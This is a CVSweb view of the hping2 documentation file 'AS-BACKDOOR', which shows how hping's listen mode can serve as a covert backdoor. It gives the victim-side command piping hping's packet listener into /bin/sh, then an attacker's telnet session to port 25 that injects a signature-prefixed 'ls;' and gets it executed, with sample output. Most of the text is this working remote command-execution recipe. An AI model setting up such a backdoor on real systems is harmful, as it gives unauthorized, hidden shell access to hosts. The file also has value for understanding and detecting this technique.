embedaddon/hping2/docs/AS-BACKDOOR - view

Return to AS-BACKDOOR CVS log

Up to [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs

File: [ELWIX - Embedded LightWeight unIX -] / embedaddon / hping2 / docs / AS-BACKDOOR
Revision 1.1.1.1 (vendor branch): download - view: text, annotated - select for diffs - revision graph
Tue Feb 21 22:11:37 2012 UTC (13 years, 6 months ago) by misho
Branches: hping2, MAIN
CVS tags: v2_0_0rc3p7, v2_0_0rc3p5, v2_0_0rc3p4, v2_0_0rc3p0, v2_0_0rc3, HEAD

hping2

    1: hping can be used as a backdoor. Just try the -9 (--listen) option
    2: and put in pipe with /bin/sh:
    3: 
    4: Put hping in listen mode in the victim host.
    5: 
    6: victim# hping -I eth0 -9 mysign | /bin/sh
    7: 
    8: Every packet that contain "mysign" will be processed by hping,
    9: all the bytes that follows "mysign" in the packet will be dumped
   10: to the standard output, so for example I'll able to exec commands
   11: using all types of protocols. Just for example I can use the smtpd
   12: to exec 'ls' in the victim.
   13: 
   14: evil$ telnet victim 25
   15: 
   16: Trying 192.168.1.1...
   17: Connected to nano (192.168.1.1).
   18: Escape character is '^]'.
   19: 220 nano.marmoc.net ESMTP Sendmail
   20: mysignls;
   21: 
   22: on the victim you will see:
   23: 
   24: victim# hping -I eth0 -9 mysign | /bin/sh
   25: hping2 listen mode
   26: bin   cdrom  etc     home  local-home  mnt   root  tmp  var
   27: boot  dev    export  lib   lost+found  proc  sbin  usr
   28: : command not found
   29: 
   30: As you can see I used 'ls;' since otherwise the shell will receive
   31: just ls^M. The ";" force the command execution (at least with bash and zsh,
   32: check your shell for more information).
   33: 
   34: This works with all kind of valid not-filtered IP packets, the higher
   35: level protocl does not matter.
   36: 
   37: antirez <antirez@invece.org>

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>